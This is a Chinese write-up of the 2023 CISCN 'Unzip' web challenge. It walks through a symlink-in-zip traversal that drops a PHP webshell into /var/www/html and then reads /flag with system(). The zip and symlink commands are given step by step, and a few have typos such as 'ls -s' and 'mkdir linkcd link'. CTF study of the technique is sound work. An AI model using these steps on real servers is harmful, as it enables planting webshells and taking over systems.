2023ciscn初赛 Unzip

 参考:

奇安信攻防社区-2021深育杯线上初赛官方WriteUp-Web篇

1.打开环境2023ciscn初赛 Unzip_第1张图片

 2.上传一个文件,得到以下源码,分析一下8

2023ciscn初赛 Unzip_第2张图片

 

当解压操作可以覆盖上一次解压文件就可以造成任意文件上传漏洞。此题上传的文件被保存到了/tmp目录下,而且没有require和include这种文件包含的点,因此无法直接执行上传文件里面的代码,因此这里考虑利用软连接,进行目录穿越,将文件上传到任意目录。

参考

一个有趣的任意文件读取 - 先知社区

软连接的作用类似于win下的快捷方式

软连接

软连接是linux中一个常用命令, 它的功能是为某一个文件在另外一个位置建立一个同步的链接。软连接类似与c语言中的指针,传递的是文件的地址; 更形象一些,软连接类似于WINDOWS系统中的快捷方式。 例如,在a文件夹下存在一个文件hello,如果在b文件夹下也需要访问hello文件,那么一个做法就是把hello复制到b文件夹下,另一个做法就是在b文件夹下建立hello的软连接。通过软连接,就不需要复制文件了,相当于文件只有一份,但在两个文件夹下都可以访问。

可以考虑软连接进行目录穿越的几个特征:

有文件上传接口,但是上传文件的目录不能确定可以上传zip文件并且会将文件解压到上传目录下
可以getshell的文件可以绕过waf成功上传此题符合几个特征,因此可以尝试此方法

3.先创建构造一个指向/var/www/html目录的软链接,因为html目录下是web环境,为了后续可以getshell

ls -s /var/www/html/ link

 4.打包到到1.zip,对link文件进行压缩。

zip --symlinks 1.zip link

2023ciscn初赛 Unzip_第3张图片

 zip --symlinks,是在zip压缩文件中,包含符号链接本身,而不是它们指向的实际文件或目录,也就是说当解压缩这个zip文件,将得到符号链接,而不是它们指向的实际文件

5.构造第二个压缩包2.zip。创建一个link目录(因为上一个压缩包里边目录就是link),

在link目录下写一个shell.php文件,文件中写入木马文件,这里先写入phpinfo()进行测试

rm link

mkdir linkcd link  (创建目录)

echo " shell.php

cd ../ 

zip -r 2.zip link 

6. 将1.zip 和2.zip 依次上传,压缩包会被解压 

2023ciscn初赛 Unzip_第4张图片

当我们上传第二个压缩包时会覆盖上一个link目录,但是link目录软链接指向/var/www/html。

之前我们上传了一个软链接web到/tmp 目录下,此时若解压z.zip的话,正常情况下会解压到:/tmp/web/shell.php 但是由于web指向了 /var/www/html目录,所以会恰好将shell.php解压到 /var/www/html/shell.php 刚好解压到网站的访问目录,达到了getsehll的目的。

传马

ln -s /var/www/html test #ln -s 源文件 目标文件
 
zip -y test1.zip test #-y:直接保存符号连接,而非该链接所指向的文件,本参数仅在UNIX之类的系统下有效;
 
rm -rf test  #rm -rf 删除文件夹
 
mkdir test  #mkdir是make directory的缩写,Linux中 mkdir 命令用来创建指定的名称的目录,要求创建目录的用户在当前目录中具有写权限,并且指定的目录名不能是当前目录中已有的目录。
 
cd test
 
echo '' > a.php
 
cd ..
 
zip -q -r test2.zip test 
#使用zip来将文件夹test压缩为test2.zip
#-r代表 recursive,代表递归处理,将指定目录下的所有文件和子目录一并处理。
#-q代表 quiet,代表无声模式,不输出压缩时的具体细节。

此时可以使用蚁剑连接或者命令执行

a=system('cat /flag')

你可能感兴趣的:(学习)